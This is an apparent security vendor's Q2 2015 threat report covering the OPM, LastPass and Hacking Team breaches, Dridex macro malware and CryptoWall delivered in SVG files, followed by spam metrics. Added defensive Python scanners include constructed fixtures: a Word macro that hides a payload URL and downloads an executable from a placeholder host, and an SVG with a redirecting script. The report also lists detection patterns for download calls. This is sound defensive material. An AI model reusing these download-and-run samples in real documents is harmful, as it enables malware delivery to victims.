
What We’ve Seen in Q2 2015

Malicious and unwanted email traffic has remained steady during the second quarter of 2015, having accounted for over 81 percent of all traffic as seen by AppRiver filters.

The second quarter of 2015 has given us even more accounts of large-scale breaches, not just of retailers but of password management companies and large government agencies. According to the Ponemon Institute’s 2015 Global Cost of Data Breach Study, the average cost of each one of these breaches has reached a record level of $3.8 million. Cyber criminals show no sign of slowing down, as these attacks against single high-value targets have proven much more lucrative than attacks against many individual targets, not to mention that they often take less effort on the criminals’ part.

We have also seen the continued spread of malware that utilizes effective techniques to part victims from their money. Ransomware continues to encrypt data, and malicious, though seemingly benign, office documents carry hidden macros that steal everything in sight.

This three-month report will discuss the above issues as we have seen them in the second quarter. In addition, we will share metrics as seen by AppRiver’s SecureTide™ and SecureSurf™ filters from our nodes throughout the world. We will point out recent trends in email and Web spam and malware campaigns and share some insight about what we can expect in the second half of the year.

Events

Office of Personnel Management Data Breach

The biggest newsworthy breach in the second quarter of 2015 has been the data breach involving the Office of Personnel Management (OPM). The OPM is responsible for keeping records of current and former government workers, as well as processing things like payroll and performing background checks. The estimated number of people affected is around 18 million. While we have seen breaches with much higher record counts, this breach is particularly disturbing given the information taken and the fact that it covers all government employees.

Included in the personal data stolen are financial histories, foreign trips taken, current and past residences, names of neighbors/friends/coworkers/roommates/relatives, and social security numbers. Since the OPM handles sensitive information, like doing background checks on people filing for security clearances, it is privy to all of that information during an investigation for approval. While this breach could include a lot of information that may be public (like addresses or previous places of work), much of it could be secrets individuals revealed in confidence while getting clearance. This could be a treasure trove of data for anyone looking to contact and phish individuals involved in the breach, or worse, to blackmail them into doing something illegal.

So far, there is no definitive proof of who orchestrated this breach, but the government is saying it was linked to a hacking group based in China. Of course, China has denied any such claims. The US also says there is evidence linking the OPM intrusion to one earlier in the year that involved the large insurance provider Anthem.

Most people have an expectation that when their data is stored with a business, it is going to be secure, even more so when it is stored with the government. Unfortunately, this was a very large government breach in which millions of personnel records were stolen, which has upset millions of victims. A class action lawsuit has been filed against the OPM by those affected. A key point in the filed lawsuit is that since 2007, the OPM has been informed by its Office of Inspector General that there were serious problems in its cybersecurity, and allegedly the OPM failed to take any action on those issues. If this is indeed the case, it shows very well why no company should ignore security risks to its systems, especially for years. Even if it is a flaw or hole that someone may think will never be found, it is likely that it will eventually be discovered and exploited.

Malicious Macros

The malware family known as Dridex, a banking Trojan that utilizes email to spread, has been very busy so far this year. Dridex is an evolution of its fellow family member Cridex, which mainly lived online, waiting for victims to surf past a website it inhabited in order to achieve infections. Apparently, Dridex got sick of all of that waiting around and decided to email itself out to the world.

Dridex has been very fond of one specific technique that has proven very successful—the use of user-activated macros within Microsoft Word and Microsoft Excel documents. By default, macros are disabled in Microsoft products, since Microsoft has recognized the inherent danger of that functionality. However, a great number of offices still utilize macros to allow documents to link to each other or to launch automated processes. Almost since the genesis of these macros, the bad guys saw an easy opportunity. They have victims run their attack code for them (without the victims’ knowledge) by attaching the code to actual office documents. When the offending attachment is opened, the recipient is prompted to enable this functionality, which allows the malicious code to run, downloading the payload from a remote server. Even though this technique requires a few more steps to actually infect its targets, it seems a good number of people have no qualms about seeing it through to fruition, as Dridex shows no real signs of slowing down. This is also a sign that their technique is working.

The themes of these malicious emails vary, but the emails themselves are usually rather short in content, while under the hood, the malicious code lies in waiting. Sometimes, this code can be seen in plaintext when analyzing the malicious attachments, but often the bad guys will obfuscate the code in order to hide its true intentions. Decimal and Base64 encoding have been a favorite of theirs, as can be seen in the example below.

This code from a Dridex campaign this year was used to hide a much shorter VBS command once it was decoded:

As can be seen in the example above, this concealed macro was designed to download the malicious payloads “dfsdfff.exe” and “ddls.gif” from the IP 91.215.138.84. As is usual, the IP that hosts the payloads changes on a campaign-by-campaign basis and will only stay responsive for a short period of time before moving on to the next.

It is highly recommended to avoid enabling macros in your office software, as this is often the only security barrier between the attackers and their victims.
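The decoding step an analyst performs on such a macro, as an added example that is not code from this report or from any Dridex sample: a small Python triage script that rebuilds strings hidden behind Chr() decimal chains and Base64 literals, then reports auto-run hooks, download calls and the URLs the decoded strings reveal. The sample macro and its 198.51.100.7 host are constructed placeholders.

```python
import base64
import re

# Indicators a reviewer looks for in VBA: auto-run hooks and download/exec helpers.
AUTO_EXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open")
SUSPICIOUS = ("Shell", "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "WScript.Shell")
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/]*)?")
CHR_RE = re.compile(r"Chr\((\d{1,3})\)")
CHR_CHAIN_RE = re.compile(r"(?:Chr\(\d{1,3}\)\s*&\s*)+Chr\(\d{1,3}\)")
B64_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')

def _printable(data: bytes):
    """Return the text if the bytes are printable ASCII, else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None

def decode_chr_chains(src: str) -> list:
    """Rebuild strings hidden as decimal Chr(104) & Chr(116) & ... chains."""
    out = []
    for m in CHR_CHAIN_RE.finditer(src):
        codes = [int(n) for n in CHR_RE.findall(m.group(0))]
        if all(c < 256 for c in codes):
            out.append("".join(chr(c) for c in codes))
    return out

def decode_base64_literals(src: str) -> list:
    """Decode quoted Base64 literals that yield printable ASCII."""
    out = []
    for m in B64_RE.finditer(src):
        try:
            text = _printable(base64.b64decode(m.group(1), validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if text:
            out.append(text)
    return out

def analyze_macro(src: str) -> dict:
    """Triage one macro: auto-run hooks, download calls, hidden strings and their URLs."""
    decoded = decode_chr_chains(src) + decode_base64_literals(src)
    urls = sorted({u for s in [src, *decoded] for u in URL_RE.findall(s)})
    auto = [n for n in AUTO_EXEC if n in src]
    return {
        "auto_exec": auto,
        "suspicious_calls": [n for n in SUSPICIOUS if n in src],
        "decoded": decoded,
        "urls": urls,
        "verdict": "block" if auto and urls else "review",
    }

def _chr_chain(s: str) -> str:
    return " & ".join(f"Chr({ord(c)})" for c in s)

# Constructed sample macro (not the real Dridex code); the payload host is the
# documentation-range address 198.51.100.7, used here only as a placeholder.
EXE_URL = "http://198.51.100.7/dfs.exe"
GIF_URL = "http://198.51.100.7/dd.gif"
SAMPLE_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim u As String, p As String\n"
    "    u = " + _chr_chain(EXE_URL) + "\n"
    '    p = Decode("' + base64.b64encode(GIF_URL.encode()).decode() + '")\n'
    '    URLDownloadToFile 0, u, Environ("TEMP") & "\\a.exe", 0, 0\n'
    "End Sub\n"
)
```

Run `analyze_macro` over the VBA source extracted from an attachment (for example with olevba) rather than opening the document; the verdict is a triage hint, not a replacement for sandboxing.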

Amazon-Themed Malware Targets Cryptocurrencies

During June, we witnessed an attack posing as legitimate Amazon purchase confirmations, again attempting to leverage macros in Word documents to infect victims. This malware would attempt to steal account credentials for a lengthy list of FTP and file storage programs, as well as various passwords from infected machines, such as those for MS Outlook and installed browsers such as Firefox, IE, Opera and Chrome. In addition to these, however, it would then begin pilfering the target machine for just about every type of cryptocurrency in existence.

This behavior (stealing cryptocurrency) is something we have been seeing with more frequency lately. The anonymous nature and lack of regulation in the cryptocurrency market make it more akin to stealing actual cash than to committing wire fraud by raiding someone’s online bank accounts. But in this case, the cybercriminals are fine with that too.

LastPass Master Passwords Pilfered

On June 15, 2015, the secure password management company LastPass started informing users of a data breach. The breach of LastPass data is concerning to most people, since security and passwords are the company’s cornerstone. Some of the data stolen during the breach included email addresses of users, password reminders, and authentication hashes. While this is very concerning data, possibly the worst part for users to hear was that their master password hashes had been taken. LastPass did assure users that their password vaults were not taken (the vault contains all of the stored passwords that were saved by the user), but as any LastPass user knows, having the master password means you could gain access to everything. Fortunately, LastPass actually uses strong protection of the master passwords by using “a random salt and 100,000 rounds of server-side PBKDF2-SHA256, in addition to the rounds performed client-side.” While this is a nice thing to be reassured by, it was still recommended that everyone change their master passwords and look into using two-factor authentication.
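To show why the quoted scheme matters once the hashes are stolen, an added illustration that is not LastPass code: a two-stage PBKDF2-SHA256 derivation with client-side rounds followed by 100,000 server-side rounds over a random salt, plus a rough estimate of what each offline guess costs an attacker. The client round count and the use of the account e-mail as the client salt are assumptions made here.

```python
import hashlib
import hmac
import os
import time

# Server-side figure as quoted from LastPass in the text above; the client-side
# count is an assumption for illustration (the text does not state it).
SERVER_ROUNDS = 100_000
CLIENT_ROUNDS = 5_000


def client_stretch(master_password: str, email: str, rounds: int = CLIENT_ROUNDS) -> bytes:
    """Client side: stretch the master password before it leaves the browser.
    Using the lower-cased account e-mail as the client salt is an assumption here."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode(), email.lower().encode(), rounds)


def server_hash(login_key: bytes, salt: bytes, rounds: int = SERVER_ROUNDS) -> bytes:
    """Server side: a second PBKDF2-SHA256 pass over the received key with a per-user random salt."""
    return hashlib.pbkdf2_hmac("sha256", login_key, salt, rounds)


def enroll(master_password: str, email: str) -> dict:
    """What the server stores: the random salt and the authentication hash, never the password."""
    salt = os.urandom(16)
    auth_hash = server_hash(client_stretch(master_password, email), salt)
    return {"email": email, "salt": salt, "auth_hash": auth_hash}


def verify(record: dict, master_password: str) -> bool:
    """Login check with a constant-time compare so timing does not leak partial matches."""
    candidate = server_hash(client_stretch(master_password, record["email"]), record["salt"])
    return hmac.compare_digest(candidate, record["auth_hash"])


def offline_guess_cost(record: dict, guesses: int) -> float:
    """Seconds an attacker holding only the stolen e-mail, salt and hash would spend on
    `guesses` candidate passwords on this machine: every guess repeats both stages."""
    t0 = time.perf_counter()
    verify(record, "not-the-password")
    return (time.perf_counter() - t0) * guesses
```

Two users with the same master password get different stored hashes because of the random salt, so a cracked hash cannot be reused against another account.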

CryptoWall Hides in Vector Images

Ransomware has made a brand new name for itself since the latter half of 2013, thanks to new techniques utilized by the Crypto-style families of malware that have become very aggressive recently. It all began with Cryptolocker and its spinoffs, CryptoWall and CryptoDefense, which made their first appearances around September of 2013. This family of malware, referred to as ransomware, is malicious software that demands the payment of a ransom in exchange for the return of access to the victim’s computer or files. Even though this technique has been around since the late 80s, most earlier examples did not create such a panic as Cryptolocker has, since most were easily subverted. Cryptolocker, however, employed strong encryption to scramble nearly every file on its target’s computer and made them impossible to recover without the corresponding private key. Even if the Cryptolocker infection was successfully removed, the files would remain encrypted and unusable. This instantly made many of its victims aware of the importance of a reliable backup strategy.

In May of this year, we began to see a CryptoWall variant hiding somewhere we had not seen before: inside of vector graphics files. It began as an email campaign with zipped SVG files attached to the messages. SVG files are normally used for images and support some interactive features, like a graph on a webpage that displays information when the cursor hovers over an option. These SVG files, however, contained a small JavaScript entry that would open a webpage to download the payload.

The IP link in the image ended up forwarding to another domain where a zip of the actual EXE payload was downloaded. However, it did not auto-execute; user interaction was still needed for that. The payload this time just happened to be CryptoWall. When the file was finally executed, it created HELP_DECRYPT.TXT, HELP_DECRYPT.PNG, HELP_DECRYPT.HTML, and HELP_DECRYPT.URL files, all of which have been associated with CryptoWall infections. It also created a public RSA key and entered it into the registry (the key used to encrypt the files). After just a few minutes, the CryptoWall 3.0 popup indeed appeared with steps on how to pay.

Crypto ransomware has proven many times that it is effective for attackers in getting users to actually pay the ransom. The tactic is still alive and likely to continue evolving. With the attacks still being prevalent, it is a good idea to make sure you are covered with data backups that cannot potentially be accessed by the malware (it has been known to encrypt network shares and NAS units).
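A gateway-side check for the SVG trick described above, as an added example that is not code from this report: it unpacks a zipped attachment in memory and flags any SVG member carrying a script element or an on* event handler, the two ways an image file can run JavaScript. The two SVG files and the 198.51.100.7 address are constructed placeholders.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

ACTIVE_SCHEMES = ("http://", "https://", "javascript:", "data:")


def scan_svg(data: bytes) -> dict:
    """Flag active content in an SVG: <script> bodies, on* event handlers and
    hrefs pointing at remote or script URLs. A parse failure is quarantined too."""
    report = {"scripts": [], "handlers": [], "external_refs": [], "parse_error": None}
    try:
        root = ET.fromstring(data)  # the stdlib parser does not fetch external entities
    except ET.ParseError as exc:
        report["parse_error"] = str(exc)
        report["verdict"] = "quarantine"
        return report
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # drop the namespace prefix
        if tag == "script":
            report["scripts"].append((el.text or "").strip()[:80])
        for attr, val in el.attrib.items():
            name = attr.split("}")[-1]
            if name.lower().startswith("on"):
                report["handlers"].append((tag, name, val[:80]))
            elif name == "href" and val.strip().lower().startswith(ACTIVE_SCHEMES):
                report["external_refs"].append((tag, val))  # informational only
    active = report["scripts"] or report["handlers"]
    report["verdict"] = "quarantine" if active else "allow"
    return report


def scan_zip_attachment(blob: bytes) -> dict:
    """Open a zipped attachment in memory and scan every SVG member (size-capped)."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".svg") and info.file_size < 5_000_000:
                results[info.filename] = scan_svg(zf.read(info))
    return results


def _zip_of(files: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples (not the real campaign files); the script target is the
# documentation-range address 198.51.100.7, used here only as a placeholder.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <script type="text/javascript">window.location = "http://198.51.100.7/";</script>
</svg>"""
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect x="1" y="1" width="8" height="8" fill="#333"/>
</svg>"""
SAMPLE_ZIP = _zip_of({"invoice_2015.svg": MALICIOUS_SVG, "logo.svg": CLEAN_SVG})
```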


Another interesting bit of information we noticed while looking at the downloaded EXE was that it had SQL commands hard coded in it. Looking closer, they all seemed related to what could be a school’s SQL database. Some of the recipients we stopped this malware for were schools, but nothing seemed out of the ordinary with the volume of recipients, which was low in general. While it is possible the malware had intentions other than encrypting in mind, like wreaking havoc in a SQL database, this came from a strings output, so it was all plain text, and the table naming conventions just seem a little too plain as well. However, for a school using a plain naming convention, or for someone who knows the SQL table names, it could be problematic if the malware were to attempt to gain access and do its thing. It is also a common tactic for malware authors to add in code that is not used, or code that fluffs up functions, to distract from analysis and make analyzing more complex and time consuming. While these appeared to be part of valid functions, it looks like they were not used during testing, although it is possible that very specific parameters needed to be met for this to go active and attempt SQL changes.

Hacking Team Data Dump

The most recent data breach to hit the headlines has been the huge amount of data taken from a security firm called Hacking Team. The Milan, Italy-based company is primarily focused on selling software to government and private agencies that allows them to remotely access computers and devices. Yes, they essentially created and sold spyware to governments. They had specifically designed software to allow this remote access to devices like cell phones and personal computers, as well as knowledge of zero-day exploits they could use. On July 5, 2015, 400 GB of their data was released on the Internet for people to torrent, including emails, invoices, and source code.

The zero-day exploit leaked in the documents that Hacking Team knew about was for Adobe Flash. Since the leaked documents had detailed information on the exploit, malware authors were able to quickly take advantage of it and start delivering malware like CryptoWall to browsers online. The Adobe exploit was referred to in the leaked documents as “the most beautiful flash bug in the last four years” by Hacking Team. Adobe is already scheduled to get an immediate fix out for it, but now that it is out in the wild, malware authors may be in a rush to take advantage of it before it is fixed.

The actual hack is claimed by “PhineasFisher,” the same hacker who was involved with the data breach of Gamma, another cybersecurity company that sold software to governments for spying (FinFisher). This naturally leads one to wonder who is behind it and what motivates him. Whether it be hacktivism, money, or even a competitor, “PhineasFisher” has already announced that these two are down but there are more to go.

Metrics

Traffic by Region

This chart represents the region of origin for spam as detected by AppRiver filters. Spam originating from North America overtook Europe in 2014 and continued to expand its share in the first half of 2015. North America and Europe now account for seventy-eight percent of the spam traffic we see.

Spam by Country

This chart represents the top countries from which spam originated during 2015’s second quarter. The US remained the top point of origin for spam, as it was the point of origin for nearly 2.6 billion spam and malicious emails throughout the second quarter. Spam emanating from the US has now increased for the fourth consecutive quarter.

Spam Traffic

This chart displays spam traffic throughout the second quarter of 2015. Spam traffic decreased slightly from the first quarter. While on most days spam volumes were around 40-50 million messages per day, there were several large traffic spikes where spam volume increased by 300 percent or more over the previous day. In all, we quarantined roughly 4.7 billion spam messages in the second quarter.

Virus Traffic

This chart displays virus traffic from the second quarter of 2015. Malware distribution was steady as we quarantined 165 million messages with virus attachments.

Top Email Virus Threats

These are the top 20 malware threats we saw in June 2015 in order of frequency, with the most frequent appearing at the top. The virus names that begin with "X." signify rules that were written by AppRiver analysts (this does not mean that other anti-virus vendors did not eventually have definitions in place for these viruses; it simply means that AppRiver often had protection in place before any of them).

• X.MrinvBasic.exe
• X.HeurFXexeBSc.exe
• X.BadMacAOa_b.doc
• X.W32Troj.patre.zip
• X.HeurFXexeBSa.exe
• X.Suspw18IMp.exe
• X.HeurNMQ.exe
• X.BDexYR.heurB.exe
• X.MSW.Mac.DLfile.100114a
• X.YTBNscr.zip
• X.HurGenMalNMF.zip
• X.W32.Bredolab.pak
• X.SuspBDimpGTP.exe
• X.SuspImMal.RAb.exe
• X.MysVM.bdis.exe
• X.HeurNMK.exe
• X.GenMalth26YSI.zip
• X.W32.Ramnit.lc
• X.HeurNMC.exe
• X.MrinvBasicB.exe